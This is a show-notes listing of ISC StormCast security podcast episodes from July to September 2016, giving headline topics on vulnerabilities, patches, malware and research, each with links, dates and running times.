Critical Update For Cisco WebEx Server https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160914-wem
Dualtoy Malware Attacks iOS and Android http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/
Certificate Pinning Issue in Firefox/Tor Browser https://hackernoon.com/tor-browser-exposed-anti-privacy-implantation-at-mass-scale-bd68e9eb1e95#.9jnte0u52
9/16/2016, 5 minutes, 50 seconds
ISC StormCast for Thursday, September 15th 2016

Exploit Attempts for Drupal RESTWS Module Vulnerability https://isc.sans.edu/forums/diary/Exploit+Attempts+for+Drupal+RESTWS+x+Module+Vulnerability/21481/
Google France XSS Vulnerability https://sysdream.com/news/lab/2016-09-12-cross-site-scripting-vulnerability-found-on-www-google-fr/
Pokemon Go Continues to Lead to Malware https://securelist.com/blog/mobile/76081/rooting-pokemons-in-google-play-store/
VMWare Update Fixes Escape Vulnerability https://www.vmware.com/security/advisories/VMSA-2016-0014.html
9/15/2016, 5 minutes, 11 seconds
ISC StormCast for Wednesday, September 14th 2016

Microsoft Patches https://isc.sans.edu/mspatchdays.html?viewday=2016-09-13
Adobe Air Patches https://helpx.adobe.com/security/products/air/apsb16-31.html
iOS 10 Update https://isc.sans.edu/forums/diary/Apple+iOS+10+and+1001+Released/21473/
9/14/2016, 9 minutes, 21 seconds
ISC StormCast for Tuesday, September 13th 2016

If it's Free, YOU are the Product https://isc.sans.edu/forums/diary/If+its+Free+YOU+are+the+Product/21469/
Weak MySQL Configurations Can Lead To Privilege Escalation http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html
Full Disk Encryption Ransomware https://www.linkedin.com/pulse/mamba-new-full-disk-encryption-ransomware-family-member-marinho?trk=prof-post
9/13/2016, 6 minutes, 15 seconds
ISC StormCast for Monday, September 12th 2016

Upgrading Securely to macOS Sierra https://isc.sans.edu/forums/diary/Getting+Ready+for+macOS+Sierra+Upgrade+Securely/21465/
PCI PIN Transaction Security / Point of Interaction Update https://www.pcisecuritystandards.org/documents/PCI_PTS_POI_SRs_v5.pdf
IMAPS Scans https://isc.sans.edu/forums/diary/Ongoing+IMAP+Scan+Anyone+Else/21463/
9/12/2016, 6 minutes, 21 seconds
ISC StormCast for Friday, September 9th 2016

Spikes in SNMP Traffic: Looking for PCAPs https://isc.sans.edu/forums/diary/Curious+SNMP+Traffic+Spike/21457/
New Version of Wireshark Released https://www.wireshark.org/docs/relnotes/wireshark-2.2.0.html
XEN Hypervisor Vulnerabilities https://xenbits.xen.org/xsa/
Google Moving Ahead With HTTP Phaseout https://security.googleblog.com/2016/09/moving-towards-more-secure-web.html
Old Windows Media Player DRM Feature Still Used To Install Malware http://blog.cyren.com/articles/windows-media-player-drm-feature-used-for-malware-delivery-again.html
SEC503 Intrusion Detection in Depth Online Training https://www.sans.org/vlive/details/sec503-19sep2016-johannes-ullrich-phd
9/8/2016, 7 minutes, 4 seconds
ISC StormCast for Thursday, September 8th 2016

DShield Blocklist Update https://isc.sans.edu/forums/diary/Updated+DShield+Blocklist/21453/
Fortinet FortiWAN Load Balancer Multiple Unpatched Vulnerabilities http://www.kb.cert.org/vuls/id/724487
Rapid7 Published NSM Vulnerabilities http://www.theregister.co.uk/2016/09/07/natwork_magement_vulns/
OPM Breached by Two Different Attackers https://oversight.house.gov/wp-content/uploads/2016/09/The-OPM-Data-Breach-How-the-Government-Jeopardized-Our-National-Security-for-More-than-a-Generation.pdf
9/8/2016, 5 minutes, 32 seconds
ISC StormCast for Wednesday, September 7th 2016

Google September Android Security Update https://source.android.com/security/bulletin/2016-09-01.html
Hard Coded Password / Key Issue Gets Worse http://blog.sec-consult.com/2016/09/house-of-keys-9-months-later-40-worse.html
Snagging Credentials From Locked Machines (Windows and OS X) https://room362.com/post/2016/snagging-creds-from-locked-machines/
9/6/2016, 5 minutes, 51 seconds
ISC StormCast for Tuesday, September 6th 2016

Apple Patches OS X and Safari for Trident/Pegasus Vulnerabilities https://support.apple.com/en-us/HT201222
Malware Delivered via ".pub" Files https://isc.sans.edu/forums/diary/Malware+Delivered+via+pub+Files/21443/
Sophos Anti Virus False Positive Causes Blue Screen of Death https://community.sophos.com/kb/en-us/125000
Adobe Reviving Flash for Linux https://blogs.adobe.com/flashplayer/2016/08/beta-news-flash-player-npapi-for-linux.html
Google Patches Nexus 5X Vulnerability https://securityintelligence.com/undocumented-patched-vulnerability-in-nexus-5x-allowed-for-memory-dumping-via-usb/
9/6/2016, 5 minutes, 13 seconds
ISC StormCast for Friday, September 2nd 2016

Malware Using Maxmind For Geolocation https://isc.sans.edu/forums/diary/Maxmindcom+Abused+As+AntiAnalysis+Technique/21435/
Content Security Policy of Limited Use in Real World https://research.google.com/pubs/pub45542.html
CryptWare Bitlocker Enhancement Vulnerability https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20160831-0_CryptWare_CryptoPro_Manipulation_of_pre-boot_authentication_v10.txt
Google Releases Chrome 53 http://googlechromereleases.blogspot.com/2016/08/stable-channel-update-for-desktop_31.html
9/1/2016, 4 minutes, 56 seconds
ISC StormCast for Thursday, September 1st 2016

Adobe ColdFusion Update https://helpx.adobe.com/security/products/coldfusion/apsb16-30.html
OS X Bittorrent Client Transmission Backdoored http://www.welivesecurity.com/2016/08/30/osxkeydnap-spreads-via-signed-transmission-application/
Arrested Lurk Hacking Group Likely Developed Angler Exploit Kit https://securelist.com/analysis/publications/75944/the-hunt-for-lurk/
Vulnerable REDIS Instances Used by Fake Ransomware https://duo.com/blog/over-18-000-redis-instances-targeted-by-fake-ransomware
9/1/2016, 5 minutes, 23 seconds
ISC StormCast for Wednesday, August 31st 2016

Today's Locky Variant Arrives as a Windows Script File https://isc.sans.edu/forums/diary/Todays+Locky+Variant+Arrives+as+a+Windows+Script+File/21423/
OneLogin Breached and Secure Notes Lost https://www.onelogin.com/blog/august-2016-incident
USB Memory Stick Can Be Used to Exfiltrate Data Wirelessly http://cyber.bgu.ac.il/t/USBee.pdf
Jail Break App in Apple's App Store https://www.reddit.com/r/jailbreak/comments/506eyp/release_ppjailbreak_on_the_appstore/
8/31/2016, 4 minutes, 47 seconds
ISC StormCast for Tuesday, August 30th 2016

CA WoSign Law Validation Policy https://groups.google.com/forum/#!topic/mozilla.dev.security.policy/k9PBmyLCi8I
FBI Warns Of Vulnerabilities in State Election Websites https://www.scribd.com/document/322473050/FBI-Flash-Aug-2016#from_embed
Bug in "Keeper" Password Safe Allows Attackers to Steal Passwords https://bugs.chromium.org/p/project-zero/issues/detail?id=917
Bank ATMs Compromised via Malicious EMV Chip https://www.fireeye.com/blog/threat-research/2016/08/ripper_atm_malwarea.html
8/30/2016, 5 minutes, 46 seconds
ISC StormCast for Monday, August 29th 2016

Spam with Obfuscated Javascript https://isc.sans.edu/forums/diary/Spam+with+Obfuscated+Javascript/21415/
Another Day - Another Ransomware Sample https://isc.sans.edu/forums/diary/Another+Day+Another+Ransomware+Sample/21413/
OpenSSL Update https://www.openssl.org/news/openssl-1.1.0-notes.html
Opera Sync Server Breached https://www.opera.com/blogs/security/2016/08/opera-server-breach-incident/
Fake Windows Update Delivers Ransomware http://www.bleepingcomputer.com/news/security/fantom-ransomware-encrypts-your-files-while-pretending-to-be-windows-update/
Dropbox Resets Old Passwords After Data Leak https://www.dropbox.com/help/9257?oref=e
8/29/2016, 5 minutes, 35 seconds
ISC StormCast for Friday, August 26th 2016

Out-of-Band iOS Patch Fixes 0-Day Vulnerabilities https://isc.sans.edu/forums/diary/OutofBand+iOS+Patch+Fixes+0Day+Vulnerabilities/21409/
Malicious E-Mail Installs Proxy File to Redirect Requests to santander.com.br https://isc.sans.edu/forums/diary/OutofBand+iOS+Patch+Fixes+0Day+Vulnerabilities/21409/
Nginx DNS Resolver Issue (Windows Only) http://blog.zorinaq.com/nginx-resolver-vulns/
Wifi Signals Can Be Used for Keystroke Sniffing https://www.sigmobile.org/mobicom/2015/papers/p90-aliA.pdf
8/25/2016, 6 minutes, 10 seconds
ISC StormCast for Thursday, August 25th 2016

Juniper/Cisco Updates Regarding #NSA Exploits https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10605&actp=search http://arstechnica.com/security/2016/08/nsa-linked-cisco-exploit-poses-bigger-threat-than-previously-thought/
Wildfire Ransomware Takedown and Key Recovery https://blogs.mcafee.com/mcafee-labs/wildfire-ransomware-extinguished-tool-nomoreransom-unlock-files-free/
"Sandscout" tool to exploit iOS Sandbox Vulnerabilities http://www.maclife.de/news/sandscout-forscher-tu-darmstadt-finden-sicherheitsluecken-ios-sandbox-10081401.html (sorry, only in German)
Sweet32 Birthday Attack against 3DES and Blowfish (https/openvpn) http://www.maclife.de/news/sandscout-forscher-tu-darmstadt-finden-sicherheitsluecken-ios-sandbox-10081401.html
8/24/2016, 6 minutes, 21 seconds
ISC StormCast for Wednesday, August 24th 2016

Voicemail Message Notifications Deliver Ransomware https://isc.sans.edu/forums/diary/Voice+Message+Notifications+Deliver+Ransomware/21397/
Updated Microsoft Word Bulletin https://support.microsoft.com/en-us/kb/3179163
Multiple BTS Software Vulnerabilities https://blog.zimperium.com/analysis-of-multiple-vulnerabilities-in-different-open-source-bts-products/
Popular HTTP Proxies Vulnerable to Cache Poisoning https://hostoftroubles.com
8/24/2016, 5 minutes, 28 seconds
ISC StormCast for Tuesday, August 23rd 2016

Multiple Vulnerabilities in BHU Router http://blog.ioactive.com/2016/08/multiple-vulnerabilities-in-bhu-wifi.html
Smart Socket Vulnerability https://labs.bitdefender.com/2016/08/hackers-can-use-smart-sockets-to-shut-down-critical-systems/
Smart Security Cameras are Spying on You http://www.forbes.com/sites/marcwebertobias/2016/08/22/is-your-smart-security-camera-protecting-your-home-or-spying-on-you/#6fb3a6414d1e
Veracrypt 1.18a With Limited UEFI Support https://veracrypt.codeplex.com/releases/view/625477
8/23/2016, 5 minutes
ISC StormCast for Monday, August 22nd 2016

GnuPG/libgcrypt Weak Random Numbers (CVE-2016-6316) https://lists.gnupg.org/pipermail/gnupg-announce/2016q3/000395.html
Wikileaks Leaked E-Mail Includes Malware https://github.com/bontchev/wlscrape/blob/master/malware.md
Android Vulnerable to TCP Connection Hijack https://blog.lookout.com/blog/2016/08/15/linux-vulnerability-android/
Cerber Ransomware Decryption Tool No Longer Operational https://www.cerberdecrypt.com/RansomwareDecryptionTool/
8/22/2016, 5 minutes, 4 seconds
ISC StormCast for Friday, August 19th 2016

One Compromised Site - 2 Exploit Campaigns https://isc.sans.edu/forums/diary/1+compromised+site+2+campaigns/21381/
Shadow Broker Leak Vendor Responses https://blogs.cisco.com/security/shadow-brokers http://fortiguard.com/advisory/FG-IR-16-023
Google Releases OS X Whitelisting Application https://github.com/google/santa/wiki
8/18/2016, 6 minutes, 38 seconds
ISC StormCast for Thursday, August 18th 2016

522 Error Code For the Win https://isc.sans.edu/forums/diary/522+Error+Code+for+the+Win/21377/
Short PGP Keys Abused in the Wild https://news.ycombinator.com/item?id=12296974
HTTP "FalseConnect" Vulnerability http://www.kb.cert.org/vuls/id/905344
8/17/2016, 6 minutes, 4 seconds
ISC StormCast for Wednesday, August 17th 2016

Cryptanalysis of a Fully Homomorphic Encryption Scheme http://eprint.iacr.org/2016/775.pdf
Recreating Android App Displays from Memory https://www.usenix.org/system/files/conference/usenixsecurity16/sec16_paper_saltaformaggio.pdf
Various Router Exploits Released https://medium.com/@msuiche/shadow-brokers-nsa-exploits-of-the-week-3f7e17bdc216#.mnoyydmeu
8/16/2016, 6 minutes, 4 seconds
ISC StormCast for Tuesday, August 16th 2016

Starting October 2016, Microsoft Will Use Monthly Rollup Updates for Win 7/8.1 https://blogs.technet.microsoft.com/windowsitpro/2016/08/15/further-simplifying-servicing-model-for-windows-7-and-windows-8-1/
Updated Group Policies To Block Macros in Office 2013 https://isc.sans.edu/forums/diary/MS+Office+2013+New+Macro+Controls+Sorta/21371/
Bypassing Application Whitelisting using WinDbg http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
Bypassing UAC without writing to disk https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
8/15/2016, 6 minutes, 20 seconds
ISC StormCast for Monday, August 15th 2016

Most Android Devices Protected From Quadrooter By Default http://www.androidcentral.com/google-confirms-verify-apps-can-block-apps-quadrooter-exploits
Dangers of IP Geolocation https://nakedsecurity.sophos.com/2016/08/11/couple-sue-over-ip-glitch-that-repeatedly-sent-feds-to-their-house/
Microsoft Secure Boot Key Bypass https://rol.im/securegoldenkeyboot/ (careful: highly annoying but harmless)
8/14/2016, 6 minutes, 8 seconds
ISC StormCast for Friday, August 12th 2016

Blind Spoofing of TCP Connections CVE-2016-5696 http://www.cs.ucr.edu/~zhiyunq/pub/sec16_TCP_pure_offpath.pdf
Fingerprinting TLS Using TShark https://isc.sans.edu/forums/diary/Profiling+SSL+Clients+with+tshark/21361/
Forensic Artifacts on iOS Messaging Apps https://isc.sans.edu/forums/diary/Looking+for+the+insider+Forensic+Artifacts+on+iOS+Messaging+App/21363/
Vulnerable VW Remote Keyless Unlock https://www.usenix.org/conference/usenixsecurity16/technical-sessions/presentation/garcia
8/11/2016, 9 minutes, 47 seconds
ISC StormCast for Wednesday, August 10th 2016

MSFT Patch Tuesday Summary https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+August+2016/21357/
Adobe Patch for Adobe Experience Manager https://helpx.adobe.com/security/products/experience-manager/apsb16-27.html
Avast Anti Virus Conflict With Windows 10 Anniversary Update https://forum.avast.com/index.php?topic=189403.0
8/10/2016, 5 minutes, 26 seconds

ISC StormCast for Tuesday, August 9th 2016

Using File Entropy to Identify "Ransomwared" Files https://isc.sans.edu/forums/diary/Using+File+Entropy+to+Identify+Ransomwared+Files/21351/
Bypassing Windows Digital Signatures https://www.blackhat.com/docs/us-16/materials/us-16-Nipravsky-Certificate-Bypass-Hiding-And-Executing-Malware-From-A-Digitally-Signed-Executable-wp.pdf
Quadrooter Android Vulnerability http://blog.checkpoint.com/2016/08/07/quadrooter/
Defcon Slides Online https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/
Philips Hue Exploit (Video) http://colinoflynn.com/wp-content/uploads/2016/08/us-16-OFlynn-A-Lightbulb-Worm-wp.pdf
8/8/2016, 6 minutes, 15 seconds

ISC StormCast for Monday, August 8th 2016

Analyzing Malicious RTF Files https://isc.sans.edu/forums/diary/rtfdump/21347/
Monitors Vulnerable To Remote Code Execution http://motherboard.vice.com/read/hackers-could-break-into-your-monitor-to-spy-on-you-and-manipulate-your-pixels
Brute Forcing Encrypted Hard Drive Protections https://www.blackhat.com/docs/us-16/materials/us-16-OFlynn-Brute-Forcing-Lockdown-Harddrive-PIN-Codes.pdf
What is Using Your Webcam http://www.welivesecurity.com/2016/08/04/afraid-someone-misusing-webcam/
8/8/2016, 5 minutes, 39 seconds

ISC StormCast for Friday, August 5th 2016

Surge in Scans for Netis Router https://isc.sans.edu/forums/diary/Surge+in+Exploit+Attempts+for+Netis+Router+Backdoor+UDP53413/21337/
iPhone Thieves Use Targeted Phishing https://hackernoon.com/this-is-what-apple-should-tell-you-when-you-lose-your-iphone-8f07cf73cf82#.spgmbaejk
NUUO/ReadyNAS Video Recorder Vulnerabilities https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt
mix-blend-mode Browser History Leak https://lcamtuf.blogspot.com/2016/08/css-mix-blend-mode-is-bad-for-keeping.html
8/5/2016, 6 minutes, 32 seconds

ISC StormCast for Thursday, August 4th 2016

The Dark Side of Certificate Transparency https://isc.sans.edu/forums/diary/The+Dark+Side+of+Certificate+Transparency/21329/
Ouch Security Awareness Newsletter https://securingthehuman.sans.org/resources/newsletters/ouch/2016
HTTP/2 Vulnerabilities http://www.imperva.com/docs/Imperva_HII_HTTP2.pdf
8/4/2016, 6 minutes, 17 seconds

ISC StormCast for Wednesday, August 3rd 2016

Windows 10 Anniversary Update Feedback https://kc.mcafee.com/corporate/index?page=content&id=KB87536
Android Updates https://source.android.com/security/bulletin/2016-08-01.html
Unlocking Murder Victim Phone With Printed Fingerprint http://msutoday.msu.edu/news/2016/accessing-a-murder-victims-smartphone-to-help-solve-a-crime/
signout.live.com remote code execution vulnerability http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
Edge/IE Still Leak NTLM Credentials (since 1997!) hxxp://witch.valdikss.org.ru (careful: test site will try to grab credentials)
8/3/2016, 5 minutes, 44 seconds

ISC StormCast for Tuesday, August 2nd 2016

Are You Getting I-CANNED? https://isc.sans.edu/forums/diary/Are+you+getting+ICANNED/21323/
Windows 10 Anniversary Edition https://blogs.windows.com/windowsexperience/2016/06/29/windows-10-anniversary-update-available-august-2/
Pangu Jailbreak Leading To Compromised Accounts? https://www.reddit.com/r/jailbreak/comments/4v9cju/discussion_is_pangus_jailbreak_safe_an_hour_after/ https://twitter.com/PanguTeam/status/759729314577342468
SANS Boston "Security Impact of IPv6" https://www.sans.org/event/boston-2016/bonus-sessions/9392/#bonus-box
8/2/2016, 6 minutes, 29 seconds

ISC StormCast for Monday, August 1st 2016

rtfobj Update https://isc.sans.edu/forums/diary/rtfobj/21317/
Comodo SSL Certificates Mixup https://thehackerblog.com/keeping-positive-obtaining-arbitrary-wildcard-ssl-certificates-from-comodo-via-dangling-markup-injection/index.html
SwiftKey Keyboard May Leak Private Data to Other Users https://blog.swiftkey.com/important-information-relating-to-the-status-of-our-sync-services/
New Version of OPNSense Released https://forum.opnsense.org/index.php?topic=3428.0
WhatsApp Does Not Delete All Chats http://www.zdziarski.com/blog/?p=6143
7/31/2016, 5 minutes, 51 seconds

ISC StormCast for Friday, July 29th 2016

Verifying SSL/TLS Certificates Manually https://isc.sans.edu/forums/diary/Verifying+SSLTLS+certificates+manually/21311/
LastPass Security Updates https://blog.lastpass.com/2016/07/lastpass-security-updates.html/
Android Linux Kernel Defenses https://security.googleblog.com/2016/07/protecting-android-with-more-linux.html
Update to ISC Suspicious Domain List https://isc.sans.edu/suspicious_domains.html
7/29/2016, 5 minutes, 33 seconds

ISC StormCast for Thursday, July 28th 2016

Linux Bot Analysis https://isc.sans.edu/forums/diary/Analyze+of+a+Linux+botnet+client+source+code/21305/
Critical Xen PV Guests Vulnerability https://isc.sans.edu/forums/diary/Critical+Xen+PV+guests+vulnerabilities/21307/
LastPass Vulnerability https://labs.detectify.com/2016/07/27/how-i-made-lastpass-give-me-all-your-passwords/
Chimera Ransomware Keys Leaked https://blog.malwarebytes.com/cybercrime/2016/07/keys-to-chimera-ransomware-leaked/
Fiat/Chrysler Software Recall http://www.thecarconnection.com/news/1105198_2015-chrysler-200-jeep-renegade-2014-2015-jeep-cherokee-recalled-410000-vehicles-affected?preview=true
Defending Web Applications Security Essentials (DEV522) in Vegas! https://www.sans.org/event/network-security-2016/course/defending-web-applications-security-essentials
7/28/2016, 5 minutes, 37 seconds

ISC StormCast for Wednesday, July 27th 2016

DNS Command and Control via AAAA Records https://isc.sans.edu/forums/diary/Command+and+Control+Channels+Using+AAAA+DNS+Records/21301/
Microsoft Authenticator https://blogs.technet.microsoft.com/enterprisemobility/2016/07/25/microsoft-authenticator-coming-august-15th/
WPAD May Leak HTTPS URLs http://arstechnica.com/security/2016/07/new-attack-that-cripples-https-crypto-works-on-macs-windows-and-linux/
HOnions: Tor Servers To Discover Snooping Tor Nodes https://regmedia.co.uk/2016/07/25/10_honions-sanatinia.pdf
7/27/2016, 6 minutes, 4 seconds

ISC StormCast for Tuesday, July 26th 2016

Python Malware - Part 4 https://isc.sans.edu/forums/diary/Python+Malware+Part+4/21297/
Powerware Decrypter https://github.com/pan-unit42/public_tools/blob/master/powerware/powerware_decrypt.py
No More Ransom https://www.nomoreransom.org
Pangu iOS 9.3.3 Jailbreak http://en.pangu.io
Safe Skies TSA Keys Duplicated http://www.3ders.org/articles/20160725-hackers-create-3d-printed-tsa-safe-skies-master-key-for-luggage-release-blueprints.html
7/26/2016, 5 minutes, 11 seconds

ISC StormCast for Monday, July 25th 2016

NIST Digital Authentication Guide Preview https://github.com/usnistgov/800-63-3
Powerware Ransomware Spoofing Locky http://researchcenter.paloaltonetworks.com/2016/07/unit42-powerware-ransomware-spoofing-locky-malware-family/
SAP HANA Security Advisory http://www.onapsis.com/research/security-advisories
Pokemon Go Forensics https://www.gillware.com/forensics/blog/mobile-forensics/oh-no-pokemon-go-forensic-artifacts
7/25/2016, 5 minutes, 47 seconds

ISC StormCast for Friday, July 22nd 2016

A Practice ntds.dit File For Hash Extraction and Password Cracking https://isc.sans.edu/forums/diary/Practice+ntdsdit+File/21287/
Mozilla Further Reducing Flash Content https://blog.mozilla.org/futurereleases/2016/07/20/reducing-adobe-flash-usage-in-firefox/
Little Snitch Update https://www.obdev.at/products/littlesnitch/releasenotes.html
PHP 7.0.9 / 5.6.24 Released (fixes httpoxy vulnerability) http://php.net/ChangeLog-7.php#7.0.9 http://www.php.net/ChangeLog-5.php#5.6.24
Google Chrome Update http://googlechromereleases.blogspot.com/search/label/Stable%20updates
7/22/2016, 4 minutes, 49 seconds

ISC StormCast for Thursday, July 21st 2016

Oracle Critical Patch Update http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
DNS Root Key Rotation http://schd.ws/hosted_files/icann562016/60/Matt%20Larson%20ICANN56%20KSK%20roll%20briefing.pdf
Anti-Malware Code Hooking Vulnerabilities http://breakingmalware.com/vulnerabilities/captain-hook-pirating-avs-bypass-exploit-mitigations/
More Details Regarding Apple's Image I/O Vulnerability http://www.talosintelligence.com/reports/TALOS-2016-0171/
Hidden Backdoor in Dell Security Software https://www.digitaldefense.com/ddi-six-discoveries/
7/21/2016, 5 minutes, 17 seconds

ISC StormCast for Wednesday, July 20th 2016

Objective Systems ASN1C Compiler Creates Vulnerable Code https://github.com/programa-stic/security-advisories/tree/master/ObjSys/CVE-2016-5080
Office Maldoc Analysis https://isc.sans.edu/forums/diary/Office+Maldoc+Lets+Focus+on+the+VBA+Macros+Later/21275/
Defeating GMail's Malicious Macro Signatures https://warroom.securestate.com/bypassing-gmails-malicious-macro-signatures/
7/20/2016, 5 minutes, 6 seconds

ISC StormCast for Tuesday, July 19th 2016

httpoxy Vulnerability https://isc.sans.edu/forums/diary/HTTP+Proxy+Header+Vulnerability+httpoxy/21271/
Apple Security Updates https://support.apple.com/en-us/HT201222
Toll Number Calling via Two Factor Authentication https://www.arneswinnen.net/2016/07/how-i-could-steal-money-from-instagram-google-and-microsoft/
7/19/2016, 6 minutes, 28 seconds

ISC StormCast for Monday, July 18th 2016

More Python Malware
Critical Juniper Vulnerability https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10755&actp=search
MS16-053 Included in Neutrino Exploit Kit https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html
SSH Username Disclosure http://seclists.org/fulldisclosure/2016/Jul/51
7/18/2016, 5 minutes, 43 seconds

ISC StormCast for Friday, July 15th 2016

The Power of Web Shells https://isc.sans.edu/forums/diary/The+Power+of+Web+Shells/21257/
Airtel India Intercepting Cloudflare Traffic https://medium.com/@karthikb351/airtel-is-sniffing-and-censoring-cloudflares-traffic-in-india-and-they-don-t-even-know-it-90935f7f6d98#.g78ucnpo6
WordPress SEO Pack Plugin Persistent Cross Site Scripting https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html
Github Releases synsanity SYN Flood Defense http://githubengineering.com/syn-flood-mitigation-with-synsanity/
MS16-094 Prevents Booting Linux On Microsoft Surface http://www.theregister.co.uk/2016/07/15/windows_fix_closes_rt_unlock_loophole/
7/15/2016, 5 minutes, 25 seconds

ISC StormCast for Thursday, July 14th 2016

Hunting for Malicious Files with MISP + OSSEC https://isc.sans.edu/forums/diary/Hunting+for+Malicious+Files+with+MISP+OSSEC/21251/
Drupal: Patch released today to fix a highly critical RCE in contributed modules https://isc.sans.edu/forums/diary/Drupal+Patch+released+today+to+fix+a+highly+critical+RCE+in+contributed+modules/21255/
Riffle anonymity network trying to compete with Tor http://people.csail.mit.edu/devadas/pubs/riffle.pdf
7/14/2016, 4 minutes, 38 seconds

ISC StormCast for Wednesday, July 13th 2016

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+Summary+for+July+2016/21249/
"Ranscam" Ransomware Deletes Data http://blog.talosintel.com/2016/07/ranscam.html
7/13/2016, 7 minutes, 34 seconds

ISC StormCast for Tuesday, July 12th 2016

Hiding in White Text: Word Documents with Embedded Payloads https://isc.sans.edu/forums/diary/Hiding+in+White+Text+Word+Documents+with+Embedded+Payloads/21227/
Pokemon Go Requests "Full Access" to iOS User's Google Account http://adamreeve.tumblr.com/post/147120922009/pokemon-go-is-a-huge-security-risk
Hacking Siri With Barely Audible Voice Commands https://security.cs.georgetown.edu/~tavish/hvc_usenix.pdf
iOS Users Locked Out of Devices by Ransom Attacks http://www.csoonline.com/article/3093016/security/apple-devices-held-for-ransom-rumors-claim-40m-icloud-accounts-hacked.html
Contact Form For Feedback https://isc.sans.edu/contact.html
7/12/2016, 6 minutes, 1 second

ISC StormCast for Monday, July 11th 2016

Pentesters (and Attackers) Love Internet Connected Security Cameras! https://isc.sans.edu/forums/diary/Pentesters+and+Attackers+Love+Internet+Connected+Security+Cameras/21231/
Lessons Learned From Industrial Control Systems https://isc.sans.edu/forums/diary/Lessons+Learned+from+Industrial+Control+Systems/21243/
BMW Portal Insecurity http://www.vulnerability-lab.com/get_content.php?id=1736 http://www.vulnerability-lab.com/get_content.php?id=1737
Pokemon Go App Used To Rob Users https://regmedia.co.uk/2016/07/10/34798567498753.pdf
Facebook Messenger End-to-End Encryption http://newsroom.fb.com/news/2016/07/messenger-starts-testing-end-to-end-encryption-with-secret-conversations/
7/11/2016, 5 minutes, 20 seconds

ISC StormCast for Friday, July 8th 2016

Patchwork: Is it still "Advanced" if all you have to do is Copy/Paste? https://isc.sans.edu/forums/diary/Patchwork+Is+it+still+Advanced+if+all+you+have+to+do+is+CopyPaste/21235/
OUCH Newsletter https://securingthehuman.sans.org/resources/newsletters/ouch/2016#july2016
Discovering Malware in TLS Traffic http://arxiv.org/abs/1607.01639
TP-Link Uses tplinklogin.net Domain http://thehackernews.com/2016/07/tp-link-router-setting.html
7/7/2016, 5 minutes, 24 seconds

ISC StormCast for Thursday, July 7th 2016

CryptXXX Update https://isc.sans.edu/forums/diary/CryptXXX+ransomware+updated/21229/
Symantec Patches On the Way (but not fast) https://twitter.com/taviso?lang=en
Android Adware/Malware https://blog.checkpoint.com/wp-content/uploads/2016/07/HummingBad-Research-report_FINAL-62916.pdf
HP Updates Comware and VCX Routers https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05184351
Tracking Devices With Randomized Wifi MAC Addresses http://papers.mathyvanhoef.com/asiaccs2016.pdf
7/7/2016, 5 minutes, 20 seconds

ISC StormCast for Wednesday, July 6th 2016

Apache Fixes Critical HTTP/2 TLS Authentication Flaw https://isc.sans.edu/forums/diary/Apache+Update+TLS+Certificate+Authentication+Bypass+with+HTTP2+CVE20164979/21223/
Gigabyte and HP Motherboards Affected by "ThinkPwn" UEFI Vulnerability https://twitter.com/al3xtjames
UK Police Data Breaches https://www.bigbrotherwatch.org.uk/wp-content/uploads/2016/07/Safe-in-Police-Hands.pdf
Mac Malware Uses Tor For C&C https://labs.bitdefender.com/2016/07/new-mac-backdoor-nukes-os-x-systems/
Front Door Intercom Backdoor http://www.synacktiv.ninja/ressources/NDH-Intercoms_presentation_Dudek.pdf
wget arbitrary command line execution with redirects https://blogs.securiteam.com/index.php/archives/2701
7/6/2016, 5 minutes, 34 seconds

ISC StormCast for Tuesday, July 5th 2016

Change in patterns for the pseudoDarkleech Campaign https://isc.sans.edu/forums/diary/Change+in+patterns+for+the+pseudoDarkleech+campaign/21217/
Thinkpad SMM Arbitrary Code Execution Exploit https://github.com/Cr4sh/ThinkPwn
SQLite Temp File Vulnerability http://seclists.org/fulldisclosure/2016/Jul/0
AVG Publishes Multi-Ransomware Decryption Tool http://now.avg.com/dont-pay-the-ransom-avg-releases-six-free-decryption-tools-to-retrieve-your-files/
Euro 2016 App Leaks User's Data http://wandera.com/downloads/Euro_Paper.pdf
7/5/2016, 4 minutes, 55 seconds

ISC StormCast for Friday, July 1st 2016

Phishing Campaign with Blurred Images https://isc.sans.edu/forums/diary/Phishing+Campaign+with+Blurred+Images/21207/
Foxit Patches PDF Reader Security Flaws https://www.foxitsoftware.com/support/security-bulletins.php#content-2016
Vulnerabilities in StartCom's API https://www.computest.nl/blog/startencrypt-considered-harmful-today/
Hummer Trojan Leads Android Malware http://www.cmcm.com/blog/en/security/2016-06-29/995.html
7/1/2016, 5 minutes, 34 seconds
Episode Artwork

ISC StormCast for Thursday, June 30th 2016

Critical Symantec AV Vulnerabilities http://googleprojectzero.blogspot.ca/2016/06/how-to-compromise-enterprise-endpoint.html Google "My Activity" https://myactivity.google.com/myactivity Hashcat/OCLHashcat 3.0 Released https://hashcat.net/forum/thread-5559.html Lenovo Thinkpad Firmware Reverse Analysis http://blog.cr4.sh/2016/06/exploring-and-exploiting-lenovo.html Linux Privilege Escalation Vulnerabilities http://www.openwall.com/lists/oss-security/2016/06/24/5
6/30/2016, 4 minutes, 48 seconds

ISC StormCast for Wednesday, June 29th 2016

